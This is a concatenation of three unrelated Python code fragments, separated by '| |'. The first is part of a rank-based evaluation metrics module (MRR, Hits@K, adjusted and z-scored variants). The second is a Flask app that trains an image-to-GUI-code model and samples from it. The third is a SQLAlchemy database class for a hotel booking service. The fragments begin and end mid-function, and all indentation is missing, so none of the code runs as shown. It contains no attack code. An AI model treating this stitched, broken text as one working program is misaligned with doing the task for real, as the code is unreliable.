&= \frac{1}{n} \sum \limits_{i=1}^n \frac{H(N_i)}{N_i}
For the variance, we have for the individual ranks
.. math::
\mathbb{V}\left[r_i^{-1}\right]
&= \frac{1}{N_i} \sum \limits_{i=1}^{N_i} \left(\frac{H(N_i)}{N_i} - \frac{1}{i}\right)^2 \\
&= \frac{N_i \cdot H_2(N_i) - H(N_i)^2}{N_i^2}
and thus overall
.. math::
\mathbb{V}\left[\textrm{MRR}\right]
&= \mathbb{V}\left[\frac{1}{n} \sum \limits_{i=1}^n r_i^{-1}\right] \\
&= \frac{1}{n^2} \sum \limits_{i=1}^n \mathbb{V}\left[r_i^{-1}\right] \\
&= \frac{1}{n^2} \sum \limits_{i=1}^n \frac{N_i \cdot H_2(N_i) - H(N_i)^2}{N_i^2} \\
.. seealso::
https://en.wikipedia.org/wiki/Inverse_distribution#Inverse_uniform_distribution
---
link: https://en.wikipedia.org/wiki/Mean_reciprocal_rank
description: The inverse of the harmonic mean over all ranks.
"""
name = "Mean Reciprocal Rank (MRR)"
value_range = ValueRange(lower=0, lower_inclusive=False, upper=1, upper_inclusive=True)
synonyms: ClassVar[Collection[str]] = ("mean_reciprocal_rank", "mrr")
increasing = True
def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float: # noqa: D102
return np.reciprocal(ranks.astype(float)).mean().item()
def expected_value(
self,
num_candidates: np.ndarray,
num_samples: Optional[int] = None,
**kwargs,
) -> float: # noqa: D102
x = np.asanyarray(num_candidates)
n = x.max().item()
h = np.r_[0, generalized_harmonic_numbers(n)]
# individual ranks' expectation
x = h[num_candidates] / num_candidates
return x.mean().item()
def variance(
self,
num_candidates: np.ndarray,
num_samples: Optional[int] = None,
**kwargs,
) -> float: # noqa:D102
x = np.asanyarray(num_candidates)
n = x.max().item()
vs = np.r_[0, harmonic_variances(n)]
# individual inverse ranks' variance
x = vs[x]
# rank aggregation
return x.sum().item() / x.size**2
@parse_docdata
class AdjustedInverseHarmonicMeanRank(ReindexedMetric):
r"""The adjusted MRR index.
.. note ::
the actual lower bound is $\frac{-\mathbb{E}[\text{MRR}]}{1-\mathbb{E}[\text{MRR}]}$,
and thus data dependent.
---
link: https://arxiv.org/abs/2203.07544
description: The re-indexed adjusted MRR
tight_lower: -E[f]/(1-E[f])
"""
name = "Adjusted Inverse Harmonic Mean Rank"
synonyms: ClassVar[Collection[str]] = ("amrr", "aihmr", "adjusted_mrr", "adjusted_mean_reciprocal_rank")
value_range = ValueRange(lower=None, lower_inclusive=False, upper=1, upper_inclusive=True)
base_cls = InverseHarmonicMeanRank
@parse_docdata
class ZInverseHarmonicMeanRank(ZMetric):
"""The z-inverse harmonic mean rank (ZIHMR).
---
link: https://arxiv.org/abs/2203.07544
description: The z-scored mean reciprocal rank
"""
name = "z-Mean Reciprocal Rank (ZMRR)"
synonyms: ClassVar[Collection[str]] = ("zmrr", "zihmr")
base_cls = InverseHarmonicMeanRank
@parse_docdata
class MedianRank(RankBasedMetric):
"""The median rank.
---
link: https://arxiv.org/abs/2203.07544
description: The median over all ranks.
"""
name = "Median Rank"
value_range = ValueRange(lower=1, lower_inclusive=True, upper=math.inf)
increasing = False
def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float: # noqa: D102
return np.median(ranks).item()
@parse_docdata
class InverseMedianRank(RankBasedMetric):
"""The inverse median rank.
---
link: https://arxiv.org/abs/2203.07544
description: The inverse of the median over all ranks.
"""
name = "Inverse Median Rank"
value_range = ValueRange(lower=0, lower_inclusive=False, upper=1, upper_inclusive=True)
increasing = True
def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float: # noqa: D102
return np.reciprocal(np.median(ranks)).item()
@parse_docdata
class StandardDeviation(RankBasedMetric):
"""The ranks' standard deviation.
---
link: https://pykeen.readthedocs.io/en/stable/tutorial/understanding_evaluation.html
"""
name = "Standard Deviation (std)"
value_range = ValueRange(lower=0, lower_inclusive=True, upper=math.inf)
increasing = False
synonyms: ClassVar[Collection[str]] = ("rank_std", "std")
def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float: # noqa: D102
return np.asanyarray(ranks).std().item()
@parse_docdata
class Variance(RankBasedMetric):
"""The ranks' variance.
---
link: https://pykeen.readthedocs.io/en/stable/tutorial/understanding_evaluation.html
"""
name = "Variance"
value_range = ValueRange(lower=0, lower_inclusive=True, upper=math.inf)
increasing = False
synonyms: ClassVar[Collection[str]] = ("rank_var", "var")
def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float: # noqa: D102
return np.asanyarray(ranks).var().item()
@parse_docdata
class MedianAbsoluteDeviation(RankBasedMetric):
"""The ranks' median absolute deviation (MAD).
---
link: https://pykeen.readthedocs.io/en/stable/tutorial/understanding_evaluation.html
"""
name = "Median Absolute Deviation (MAD)"
value_range = ValueRange(lower=0, lower_inclusive=True, upper=math.inf)
increasing = False
synonyms: ClassVar[Collection[str]] = ("rank_mad", "mad")
def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float: # noqa: D102
return stats.median_abs_deviation(ranks, scale="normal").item()
@parse_docdata
class Count(RankBasedMetric):
"""The ranks' count.
Lower numbers may indicate unreliable results.
---
link: https://pykeen.readthedocs.io/en/stable/reference/evaluation.html
"""
name = "Count"
value_range = ValueRange(lower=0, lower_inclusive=True, upper=math.inf)
increasing = False
synonyms: ClassVar[Collection[str]] = ("rank_count",)
def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float: # noqa: D102
return float(np.asanyarray(ranks).size)
@parse_docdata
class HitsAtK(RankBasedMetric):
r"""The Hits @ k.
For the expected values, we first note that
.. math::
\mathbb{I}[r_i \leq k] \sim \textit{Bernoulli}(p_i)
with $p_i = \min\{\frac{k}{N_i}, 1\}$. Thus, we have
.. math::
\mathbb{E}[\mathbb{I}[r_i \leq k]] = p_i
and
.. math::
\mathbb{V}[\mathbb{I}[r_i \leq k]] = p_i \cdot (1 - p_i)
Hence, we obtain
.. math::
\mathbb{E}[Hits@k] &= \mathbb{E}\left[\frac{1}{n} \sum \limits_{i=1}^{n} \mathbb{I}[r_i \leq k]\right] \\
&= \frac{1}{n} \sum \limits_{i=1}^{n} \mathbb{E}[\mathbb{I}[r_i \leq k]] \\
&= \frac{1}{n} \sum \limits_{i=1}^{n} p_i
For the variance, we have
.. math::
\mathbb{V}[Hits@k] &= \mathbb{V}\left[\frac{1}{n} \sum \limits_{i=1}^{n} \mathbb{I}[r_i \leq k]\right] \\
&= \frac{1}{n^2} \sum \limits_{i=1}^{n} \mathbb{V}\left[\mathbb{I}[r_i \leq k]\right] \\
&= \frac{1}{n^2} \sum \limits_{i=1}^{n} p_i(1 - p_i)
---
description: The relative frequency of ranks not larger than a given k.
link: https://pykeen.readthedocs.io/en/stable/tutorial/understanding_evaluation.html#hits-k
"""
name = "Hits @ K"
value_range = ValueRange(lower=0, lower_inclusive=True, upper=1, upper_inclusive=True)
synonyms: ClassVar[Collection[str]] = ("h@k", "hits@k", "h@", "hits@", "hits_at_", "h_at_")
increasing = True
def __init__(self, k: int = 10) -> None:
super().__init__()
self.k = k
def _extra_repr(self) -> Iterable[str]:
yield f"k={self.k}"
def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float: # noqa: D102
return np.less_equal(ranks, self.k).mean().item()
@property
def key(self) -> str: # noqa: D102
return super().key[:-1] + str(self.k)
def expected_value(
self,
num_candidates: np.ndarray,
num_samples: Optional[int] = None,
**kwargs,
) -> float: # noqa: D102
num_candidates = np.asanyarray(num_candidates, dtype=float)
return np.minimum(self.k / num_candidates, 1.0).mean().item()
def variance(
self,
num_candidates: np.ndarray,
num_samples: Optional[int] = None,
**kwargs,
) -> float: # noqa:D102
num_candidates = np.asanyarray(num_candidates, dtype=float)
p = np.minimum(self.k / num_candidates, 1.0)
return (p * (1.0 - p)).mean().item() / num_candidates.size
@parse_docdata
class AdjustedHitsAtK(ReindexedMetric):
r"""The adjusted Hits at K ($AH_k$).
.. note ::
the actual lower bound is $\frac{-\mathbb{E}[H_k]}{1 - \mathbb{E}[H_k]}$, and thus data dependent.
---
link: https://arxiv.org/abs/2203.07544
description: The re-indexed adjusted hits at K
tight_lower: -E[f]/(1-E[f])
"""
name = "Adjusted Hits at K"
synonyms: ClassVar[Collection[str]] = (
"ahk",
"ah@k",
"ahits@k",
"ah@",
"ahits@",
"ahits_at_",
"ah_at_",
"adjusted_hits_at_",
)
value_range = ValueRange(lower=None, lower_inclusive=False, upper=1, upper_inclusive=True)
base_cls = HitsAtK
@parse_docdata
class ZHitsAtK(ZMetric):
"""The z-scored hits at k ($ZAH_k$).
---
link: https://arxiv.org/abs/2203.07544
description: The z-scored hits at K
"""
name = "z-Hits at K"
synonyms: ClassVar[Collection[str]] = ("z_hits_at_", "zahk")
increasing = True
supported_rank_types = (RANK_REALISTIC,)
needs_candidates = True
base_cls = HitsAtK
@parse_docdata
class AdjustedArithmeticMeanRank(ExpectationNormalizedMetric):
"""The adjusted arithmetic mean rank (AMR).
---
description: The mean over all ranks divided by its expected value.
link: https://arxiv.org/abs/2002.06914
"""
name = "Adjusted Arithmetic Mean Rank (AAMR)"
value_range = ValueRange(lower=0, lower_inclusive=True, upper=2, upper_inclusive=False)
synonyms: ClassVar[Collection[str]] = ("adjusted_mean_rank", "amr", "aamr")
supported_rank_types = (RANK_REALISTIC,)
needs_candidates = True
increasing = False
base_cls = ArithmeticMeanRank
@parse_docdata
class AdjustedArithmeticMeanRankIndex(ReindexedMetric):
"""The adjusted arithmetic mean rank index (AMRI).
---
link: https://arxiv.org/abs/2002.06914
description: The re-indexed adjusted mean rank | |
CONTEXT_LENGTH]
label = a[j + CONTEXT_LENGTH]
self.ids.append(sample_id)
self.input_images.append(img)
self.partial_sequences.append(context)
self.next_words.append(label)
@staticmethod
def indexify(partial_sequences, voc):
temp = []
for sequence in partial_sequences:
sparse_vectors_sequence = []
for token in sequence:
sparse_vectors_sequence.append(voc.vocabulary[token])
temp.append(np.array(sparse_vectors_sequence))
return temp
@staticmethod
def binarize(partial_sequences, voc):
temp = []
for sequence in partial_sequences:
sparse_vectors_sequence = []
for token in sequence:
sparse_vectors_sequence.append(voc.binary_vocabulary[token])
temp.append(np.array(sparse_vectors_sequence))
return temp
@staticmethod
def sparsify_labels(next_words, voc):
temp = []
for label in next_words:
temp.append(voc.binary_vocabulary[label])
return temp
def save_metadata(self, path):
np.save("{}/meta_dataset".format(path), np.array([self.input_shape, self.output_size, self.size]))
class Generator:
@staticmethod
def data_generator(voc, gui_paths, img_paths, batch_size, input_shape, generate_binary_sequences=False, verbose=False, loop_only_one=False, images_only=False):
assert len(gui_paths) == len(img_paths)
voc.create_binary_representation()
while 1:
batch_input_images = []
batch_partial_sequences = []
batch_next_words = []
sample_in_batch_counter = 0
for i in range(0, len(gui_paths)):
if img_paths[i].find(".png") != -1:
img = Utils.get_preprocessed_img(img_paths[i], IMAGE_SIZE)
else:
img = np.load(img_paths[i])["features"]
gui = open(gui_paths[i], 'r')
token_sequence = [START_TOKEN]
for line in gui:
line = line.replace(",", " ,").replace("\n", " \n")
tokens = line.split(" ")
for token in tokens:
voc.append(token)
token_sequence.append(token)
token_sequence.append(END_TOKEN)
suffix = [PLACEHOLDER] * CONTEXT_LENGTH
a = np.concatenate([suffix, token_sequence])
for j in range(0, len(a) - CONTEXT_LENGTH):
context = a[j:j + CONTEXT_LENGTH]
label = a[j + CONTEXT_LENGTH]
batch_input_images.append(img)
batch_partial_sequences.append(context)
batch_next_words.append(label)
sample_in_batch_counter += 1
if sample_in_batch_counter == batch_size or (loop_only_one and i == len(gui_paths) - 1):
if verbose:
print("Generating sparse vectors...")
batch_next_words = Dataset.sparsify_labels(batch_next_words, voc)
if generate_binary_sequences:
batch_partial_sequences = Dataset.binarize(batch_partial_sequences, voc)
else:
batch_partial_sequences = Dataset.indexify(batch_partial_sequences, voc)
if verbose:
print("Convert arrays...")
batch_input_images = np.array(batch_input_images)
batch_partial_sequences = np.array(batch_partial_sequences)
batch_next_words = np.array(batch_next_words)
if verbose:
print("Yield batch")
#include a generator for images only for autoencoder
if images_only:
yield(batch_input_images, batch_input_images)
else:
yield ([batch_input_images, batch_partial_sequences], batch_next_words)
batch_input_images = []
batch_partial_sequences = []
batch_next_words = []
sample_in_batch_counter = 0
class autoencoder_image(AModel):
def __init__(self, input_shape, output_size, output_path):
AModel.__init__(self, input_shape, output_size, output_path)
self.name = 'autoencoder'
input_image = Input(shape=input_shape)
encoder = Conv2D(32, 3, padding='same', activation='relu')(input_image)
encoder = Conv2D(32, 3, padding='same', activation='relu')(encoder)
encoder = MaxPooling2D()(encoder)
encoder = Dropout(0.25)(encoder)
encoder = Conv2D(64, 3, padding='same', activation='relu')(encoder)
encoder = Conv2D(64, 3, padding='same', activation='relu')(encoder)
encoder = MaxPooling2D()(encoder)
encoder = Dropout(0.25)(encoder)
encoder = Conv2D(128, 3, padding='same', activation='relu')(encoder)
encoder = Conv2D(128, 3, padding='same', activation='relu')(encoder)
encoder = MaxPooling2D()(encoder)
encoded = Dropout(0.25, name='encoded_layer')(encoder)
decoder = Conv2DTranspose(128, 3, padding='same', activation='relu')(encoded)
decoder = Conv2DTranspose(128, 3, padding='same', activation='relu')(decoder)
decoder = UpSampling2D()(decoder)
decoder = Dropout(0.25)(decoder)
decoder = Conv2DTranspose(64, 3, padding='same', activation='relu')(decoder)
decoder = Conv2DTranspose(64, 3, padding='same', activation='relu')(decoder)
decoder = UpSampling2D()(decoder)
decoder = Dropout(0.25)(decoder)
decoder = Conv2DTranspose(32, 3, padding='same', activation='relu')(decoder)
decoder = Conv2DTranspose(3, 3, padding='same', activation='relu')(decoder)
decoder = UpSampling2D()(decoder)
decoded = Dropout(0.25)(decoder)
# decoder = Dense(256*256*3)(decoder)
# decoded = Reshape(target_shape=input_shape)(decoder)
self.model = Model(input_image, decoded)
self.model.compile(optimizer='adadelta', loss='binary_crossentropy')
self.model.summary()
def fit_generator(self, generator, steps_per_epoch):
self.model.fit_generator(generator, steps_per_epoch=steps_per_epoch, epochs=EPOCHS, verbose=1)
self.save()
def predict_hidden(self, images):
hidden_layer_model = Model(inputs = self.input, outputs = self.get_layer('encoded_layer').output)
return hidden_layer_model.predict(images)
class image_to_code(AModel):
def __init__(self, input_shape, output_size, output_path):
AModel.__init__(self, input_shape, output_size, output_path)
self.name = "image_to_code"
visual_input = Input(shape=input_shape)
# Load the pre-trained autoencoder model
autoencoder_model = autoencoder_image(input_shape, input_shape, output_path)
autoencoder_model.load('autoencoder')
autoencoder_model.model.load_weights('static/model/autoencoder.h5')
# Get only the model up to the encoded part
hidden_layer_model_freeze = Model(inputs=autoencoder_model.model.input,
outputs=autoencoder_model.model.get_layer('encoded_layer').output)
hidden_layer_input = hidden_layer_model_freeze(visual_input)
# Additional layers before concatenation
hidden_layer_model = Flatten()(hidden_layer_input)
hidden_layer_model = Dense(1024, activation='relu')(hidden_layer_model)
hidden_layer_model = Dropout(0.3)(hidden_layer_model)
hidden_layer_model = Dense(1024, activation='relu')(hidden_layer_model)
hidden_layer_model = Dropout(0.3)(hidden_layer_model)
hidden_layer_result = RepeatVector(CONTEXT_LENGTH)(hidden_layer_model)
# Make sure the loaded hidden_layer_model_freeze will no longer be updated
for layer in hidden_layer_model_freeze.layers:
layer.trainable = False
language_model = Sequential()
language_model.add(LSTM(128, return_sequences=True, input_shape=(CONTEXT_LENGTH, output_size)))
language_model.add(LSTM(128, return_sequences=True))
textual_input = Input(shape=(CONTEXT_LENGTH, output_size))
encoded_text = language_model(textual_input)
decoder = concatenate([hidden_layer_result, encoded_text])
decoder = LSTM(512, return_sequences=True)(decoder)
decoder = LSTM(512, return_sequences=False)(decoder)
decoder = Dense(output_size, activation='softmax')(decoder)
self.model = Model(inputs=[visual_input, textual_input], outputs=decoder)
optimizer = RMSprop(lr=0.0001, clipvalue=1.0)
self.model.compile(loss='categorical_crossentropy', optimizer=optimizer)
def fit_generator(self, generator, steps_per_epoch):
self.model.summary()
self.model.fit_generator(generator, steps_per_epoch=steps_per_epoch, epochs=EPOCHS, verbose=1)
self.save()
def predict(self, image, partial_caption):
return self.model.predict([image, partial_caption], verbose=0)[0]
def predict_batch(self, images, partial_captions):
return self.model.predict([images, partial_captions], verbose=1)
def run(input_path, output_path, train_autoencoder=False):
np.random.seed(1234)
dataset = Dataset()
dataset.load(input_path, generate_binary_sequences=True)
dataset.save_metadata(output_path)
dataset.voc.save(output_path)
gui_paths, img_paths = Dataset.load_paths_only(input_path)
input_shape = dataset.input_shape
output_size = dataset.output_size
steps_per_epoch = dataset.size / BATCH_SIZE
voc = Vocabulary()
voc.retrieve(output_path)
generator = Generator.data_generator(voc, gui_paths, img_paths, batch_size=BATCH_SIZE, input_shape=input_shape,
generate_binary_sequences=True)
# Included a generator for images only as an input for autoencoders
generator_images = Generator.data_generator(voc, gui_paths, img_paths, batch_size=BATCH_SIZE,
input_shape=input_shape, generate_binary_sequences=True,
images_only=True)
if train_autoencoder:
autoencoder_model = autoencoder_image(input_shape, input_shape, output_path)
autoencoder_model.fit_generator(generator_images, steps_per_epoch=steps_per_epoch)
clear_session()
model = image_to_code(input_shape, output_size, output_path)
model.fit_generator(generator, steps_per_epoch=steps_per_epoch)
@app.route("/Train")
def train():
return render_template('Train.html')
@app.route("/TrainProcess", methods=["POST"])
def train_process():
print("train_process Called")
input_path = "static/datasets/web/all_data/training_features"
output_path = "static/model"
train_autoencoder = False
run(input_path, output_path, train_autoencoder=train_autoencoder)
return render_template('TrainProcess.html')
class Node:
def __init__(self, key, value, data=None):
self.key = key
self.value = value
self.data = data
self.parent = None
self.root = None
self.children = []
self.level = 0
def add_children(self, children, beam_width):
for child in children:
child.level = self.level + 1
child.value = child.value * self.value
nodes = sorted(children, key=lambda node: node.value, reverse=True)
nodes = nodes[:beam_width]
for node in nodes:
self.children.append(node)
node.parent = self
if self.parent is None:
self.root = self
else:
self.root = self.parent.root
child.root = self.root
def remove_child(self, child):
self.children.remove(child)
def max_child(self):
if len(self.children) == 0:
return self
max_childs = []
for child in self.children:
max_childs.append(child.max_child())
nodes = sorted(max_childs, key=lambda child: child.value, reverse=True)
return nodes[0]
def show(self, depth=0):
print(" " * depth, self.key, self.value, self.level)
for child in self.children:
child.show(depth + 2)
class BeamSearch:
def __init__(self, beam_width=1):
self.beam_width = beam_width
self.root = None
self.clear()
def search(self):
result = self.root.max_child()
self.clear()
return self.retrieve_path(result)
def add_nodes(self, parent, children):
parent.add_children(children, self.beam_width)
def is_valid(self):
leaves = self.get_leaves()
level = leaves[0].level
counter = 0
for leaf in leaves:
if leaf.level == level:
counter += 1
else:
break
if counter == len(leaves):
return True
return False
def get_leaves(self):
leaves = []
self.search_leaves(self.root, leaves)
return leaves
def search_leaves(self, node, leaves):
for child in node.children:
if len(child.children) == 0:
leaves.append(child)
else:
self.search_leaves(child, leaves)
def prune_leaves(self):
leaves = self.get_leaves()
nodes = sorted(leaves, key=lambda leaf: leaf.value, reverse=True)
nodes = nodes[self.beam_width:]
for node in nodes:
node.parent.remove_child(node)
while not self.is_valid():
leaves = self.get_leaves()
max_level = 0
for leaf in leaves:
if leaf.level > max_level:
max_level = leaf.level
for leaf in leaves:
if leaf.level < max_level:
leaf.parent.remove_child(leaf)
def clear(self):
self.root = None
self.root = Node("root", 1.0, None)
def retrieve_path(self, end):
path = [end.key]
data = [end.data]
while end.parent is not None:
end = end.parent
path.append(end.key)
data.append(end.data)
result_path = []
result_data = []
for i in range(len(path) - 2, -1, -1):
result_path.append(path[i])
result_data.append(data[i])
return result_path, result_data
class Sampler:
def __init__(self, voc_path, input_shape, output_size, context_length):
self.voc = Vocabulary()
self.voc.retrieve(voc_path)
self.input_shape = input_shape
self.output_size = output_size
print("Vocabulary size: {}".format(self.voc.size))
print("Input shape: {}".format(self.input_shape))
print("Output size: {}".format(self.output_size))
self.context_length = context_length
def predict_greedy(self, model, input_img, require_sparse_label=True, sequence_length=150, verbose=False):
current_context = [self.voc.vocabulary[PLACEHOLDER]] * (self.context_length - 1)
current_context.append(self.voc.vocabulary[START_TOKEN])
if require_sparse_label:
current_context = Utils.sparsify(current_context, self.output_size)
predictions = START_TOKEN
out_probas = []
for i in range(0, sequence_length):
if verbose:
print("predicting {}/{}...".format(i, sequence_length))
probas = model.predict(input_img, np.array([current_context]))
prediction = np.argmax(probas)
out_probas.append(probas)
new_context = []
for j in range(1, self.context_length):
new_context.append(current_context[j])
if require_sparse_label:
sparse_label = np.zeros(self.output_size)
sparse_label[prediction] = 1
new_context.append(sparse_label)
else:
new_context.append(prediction)
current_context = new_context
predictions += self.voc.token_lookup[prediction]
if self.voc.token_lookup[prediction] == END_TOKEN:
break
return predictions, out_probas
def recursive_beam_search(self, model, input_img, current_context, beam, current_node, sequence_length):
probas = model.predict(input_img, np.array([current_context]))
predictions = []
for i in range(0, len(probas)):
predictions.append((i, probas[i], probas))
nodes = []
for i in range(0, len(predictions)):
prediction = predictions[i][0]
score = predictions[i][1]
output_probas = predictions[i][2]
nodes.append(Node(prediction, score, output_probas))
beam.add_nodes(current_node, nodes)
if beam.is_valid():
beam.prune_leaves()
if sequence_length == 1 or self.voc.token_lookup[beam.root.max_child().key] == END_TOKEN:
return
for node in beam.get_leaves():
prediction = node.key
new_context = []
for j in range(1, self.context_length):
new_context.append(current_context[j])
sparse_label = np.zeros(self.output_size)
sparse_label[prediction] = 1
new_context.append(sparse_label)
self.recursive_beam_search(model, input_img, new_context, beam, node, sequence_length - 1)
def predict_beam_search(self, model, input_img, beam_width=3, require_sparse_label=True, sequence_length=150):
predictions = START_TOKEN
out_probas = []
current_context = [self.voc.vocabulary[PLACEHOLDER]] * (self.context_length - 1)
current_context.append(self.voc.vocabulary[START_TOKEN])
if require_sparse_label:
current_context = Utils.sparsify(current_context, self.output_size)
beam = BeamSearch(beam_width=beam_width)
self.recursive_beam_search(model, input_img, current_context, beam, beam.root, sequence_length)
predicted_sequence, probas_sequence = beam.search()
for k in range(0, len(predicted_sequence)):
prediction = predicted_sequence[k]
probas = probas_sequence[k]
out_probas.append(probas)
predictions += self.voc.token_lookup[prediction]
return predictions, out_probas
@app.route("/Produce")
def produce():
return render_template('produce.html')
@app.route("/ProduceProcess", methods=["POST"])
def produce_process():
print("produce_process Called")
trained_weights_path = "static/model"
trained_model_name = "imagetocode2"
input_path = "static/datasets/web/eval"
output_path = "static/guicode"
search_method = "greedy"
meta_dataset = np.load("{}/meta_dataset.npy".format(trained_weights_path), allow_pickle=True)
input_shape = meta_dataset[0]
output_size = meta_dataset[1]
model = image_to_code(input_shape, output_size, trained_weights_path)
model.load(trained_model_name)
sampler = Sampler(trained_weights_path, input_shape, output_size, CONTEXT_LENGTH)
for f in os.listdir(input_path):
if f.find(".png") != -1:
evaluation_img = Utils.get_preprocessed_img("{}/{}".format(input_path, f), IMAGE_SIZE)
file_name = f[:f.find(".png")]
if search_method == "greedy":
result, _ = sampler.predict_greedy(model, np.array([evaluation_img]))
print("Result greedy: {}".format(result))
else:
beam_width = int(search_method)
print("Search with beam width: {}".format(beam_width))
result, _ = sampler.predict_beam_search(model, | |
import sqlalchemy
from sqlalchemy import BigInteger
from sqlalchemy import Boolean
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import Date
from sqlalchemy import DateTime
from sqlalchemy import delete
from sqlalchemy import Float
from sqlalchemy import ForeignKey
from sqlalchemy import insert
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import text
from sqlalchemy import TIMESTAMP
from sqlalchemy import update
from sqlalchemy.sql import select
class Database:
"""Database class is used to handle requests to our database.
You can call it and specify some parameters ::
>>> from database import Database
>>> db = Database(user="matteyeux", password="<PASSWORD>",
host="localhost", database="mydb")
>>> db.db_string
'mysql+pymysql://matteyeux:pass@localhost/mydb'
>>>
"""
def __init__(
self,
connector: str = "mysql+pymysql",
user: str = None,
password: str = None,
host: str = None,
database: str = None,
):
"""Initialize self. See help(type(self)) for accurate signature."""
self.db_string = f"{connector}://{user}:{password}@{host}/{database}"
try:
self.engine = create_engine(self.db_string).connect()
except sqlalchemy.exc.OperationalError:
self.engine = None
def setup_rooms_table(self) -> sqlalchemy.sql.schema.Table:
"""Setup rooms table."""
meta = MetaData(self.engine)
rooms_table = Table(
"rooms",
meta,
Column("id", Integer, primary_key=True),
Column("hotel_id", Integer, ForeignKey("hotels.id")),
Column("room", String(50)),
Column("capacity", Integer),
Column("price", Float),
Column(
"created_time",
TIMESTAMP,
server_default=text("CURRENT_TIMESTAMP"),
),
Column(
"updated_time",
TIMESTAMP,
server_default=text(
"CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP",
),
),
)
return rooms_table
def setup_booking_table(self) -> sqlalchemy.sql.schema.Table:
"""Setup booking table for database."""
meta = MetaData(self.engine)
booking_table = Table(
"booking",
meta,
Column("id", BigInteger, primary_key=True),
Column("room_id", Integer, ForeignKey("rooms.id")),
Column("customer_id", BigInteger, ForeignKey("customers.id")),
Column("capacity_book", Integer),
Column("order_price", Float),
Column("booking_start_date", Date),
Column("booking_end_date", Date),
Column(
"created_time",
TIMESTAMP,
nullable=False,
server_default=text("CURRENT_TIMESTAMP"),
),
Column(
"updated_time",
TIMESTAMP,
nullable=False,
server_default=text(
"CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP",
),
),
)
return booking_table
def setup_hotels_table(self) -> sqlalchemy.sql.schema.Table:
"""Setup hotels table for database."""
meta = MetaData(self.engine)
hotels_table = Table(
"hotels",
meta,
Column("id", Integer, primary_key=True),
Column("name", String(40)),
Column("telephone", String(20)),
Column("website", String(100)),
Column("description", String(100)),
Column("owner", String(50)),
Column(
"created_time",
TIMESTAMP,
nullable=False,
server_default=text("CURRENT_TIMESTAMP"),
),
Column(
"updated_time",
TIMESTAMP,
nullable=False,
server_default=text(
"CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP",
),
),
)
return hotels_table
def setup_addresses_table(self) -> sqlalchemy.sql.schema.Table:
"""Setup addresses table for database."""
meta = MetaData(self.engine)
addresses_table = Table(
"addresses",
meta,
Column("id", Integer, primary_key=True),
Column("hotel_id", Integer, ForeignKey("hotels.id")),
Column("number", String(50)),
Column("street", String(50)),
Column("town", String(50)),
Column("postal_code", Integer),
Column(
"created_time",
TIMESTAMP,
nullable=False,
server_default=text("CURRENT_TIMESTAMP"),
),
Column(
"updated_time",
TIMESTAMP,
nullable=False,
server_default=text(
"CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP",
),
),
)
return addresses_table
def setup_price_policies_table(self) -> sqlalchemy.sql.schema.Table:
"""Setup price_policies table for database."""
meta = MetaData(self.engine)
price_policies = Table(
"price_policies",
meta,
Column("id", Integer, primary_key=True),
Column("room_id", Integer, ForeignKey("rooms.id")),
Column("name", String(100)),
Column("price_policy_type", Integer),
Column("room_majoration", Float),
Column("day_number", Integer),
Column("capacity_limit", Integer),
Column("majoration_start_date", DateTime),
Column("majoration_end_date", DateTime),
Column("is_default", Boolean, nullable=False),
Column(
"created_time",
TIMESTAMP,
nullable=False,
server_default=text("CURRENT_TIMESTAMP"),
),
Column(
"updated_time",
TIMESTAMP,
nullable=False,
server_default=text(
"CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP",
),
),
)
return price_policies
def setup_options_table(self) -> sqlalchemy.sql.schema.Table:
"""Setup options table for database."""
meta = MetaData(self.engine)
options = Table(
"options",
meta,
Column("id", Integer, primary_key=True),
Column("name", String(100)),
Column("price", Float),
)
return options
def get_hotels(self) -> sqlalchemy.engine.cursor.LegacyCursorResult:
""" Get all hotels with their address. """
addresses_table = self.setup_addresses_table()
hotels_table = self.setup_hotels_table()
join = hotels_table.join(
addresses_table,
hotels_table.c.id == addresses_table.c.hotel_id,
)
query = select(
hotels_table.c.id,
hotels_table.c.name,
hotels_table.c.telephone,
hotels_table.c.website,
hotels_table.c.description,
hotels_table.c.owner,
addresses_table.c.number,
addresses_table.c.street,
addresses_table.c.postal_code,
addresses_table.c.town,
).select_from(join)
return self.engine.connect().execute(query).all()
def get_hotel_by_id(
self,
hotel_id: int = 1,
) -> sqlalchemy.engine.cursor.LegacyCursorResult:
"""Get hotel info by ID"""
addresses_table = self.setup_addresses_table()
hotels_table = self.setup_hotels_table()
join = hotels_table.join(
addresses_table,
hotels_table.c.id == addresses_table.c.hotel_id,
)
query = (
select(
hotels_table.c.id,
hotels_table.c.name,
hotels_table.c.telephone,
hotels_table.c.website,
hotels_table.c.description,
hotels_table.c.owner,
addresses_table.c.number,
addresses_table.c.street,
addresses_table.c.postal_code,
addresses_table.c.town,
)
.where(hotels_table.c.id == hotel_id)
.select_from(join)
)
# Return the dict, not the list
return self.engine.connect().execute(query).fetchone()
def create_hotel(
self,
hotel,
) -> sqlalchemy.engine.cursor.LegacyCursorResult:
""" Create an hotel and its address. """
hotel_table = self.setup_hotels_table()
query_hotel = insert(hotel_table).values(
name=hotel.name,
telephone=hotel.telephone,
website=hotel.website,
description=hotel.description,
owner=hotel.owner,
)
self.engine.connect().execute(query_hotel)
last_hotel_id = (
self.engine.connect()
.execute(
"SELECT LAST_INSERT_ID() as id",
)
.fetchone()
)
return {"id": last_hotel_id.id, **hotel.dict()}
def update_hotel(self, hotel, hotel_id):
""" Update hotel by its id. """
hotel_table = self.setup_hotels_table()
query = (
update(hotel_table)
.values(
name=hotel.name,
telephone=hotel.telephone,
website=hotel.website,
description=hotel.description,
owner=hotel.owner,
)
.where(hotel_table.c.id == hotel_id)
)
self.engine.connect().execute(query)
